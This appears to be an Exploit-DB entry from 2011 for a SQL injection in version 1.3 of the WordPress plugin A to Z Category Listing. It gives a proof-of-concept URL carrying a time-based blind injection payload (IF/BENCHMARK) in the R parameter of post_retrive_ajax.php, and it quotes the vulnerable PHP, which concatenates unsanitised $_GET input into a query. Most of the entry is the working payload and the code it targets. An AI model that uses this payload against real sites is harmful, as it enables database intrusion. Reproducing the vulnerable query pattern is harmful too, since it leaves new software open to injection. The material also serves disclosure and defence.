EXPLOITS

WordPress Plugin A to Z Category Listing 1.3 - SQL Injection

Author: Miroslav Stampar
type: webapps
platform: php
port: 
date_added: 2011-09-09  
date_updated: 2011-09-09  
verified: 1  
codes: OSVDB-86069  
tags: WordPress Plugin  
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.coma-to-z-category-listing.zip  

raw file: 17809.txt  

# Exploit Title: WordPress A to Z Category Listing plugin <= 1.3 SQL Injection Vulnerability
# Date: 2011-09-09
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/a-to-z-category-listing.zip
# Version: 1.3 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/a-to-z-category-listing/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
$init_letter = $_GET['R'];
$sql = "select * from ".$table_prefix."terms wpt,".$table_prefix."term_taxonomy wptt where wpt.name like '".$init_letter."%' and wptt.taxonomy = 'category' and wpt.term_id = wptt.term_id";
...
$sql_rec = $wpdb->get_results($sql);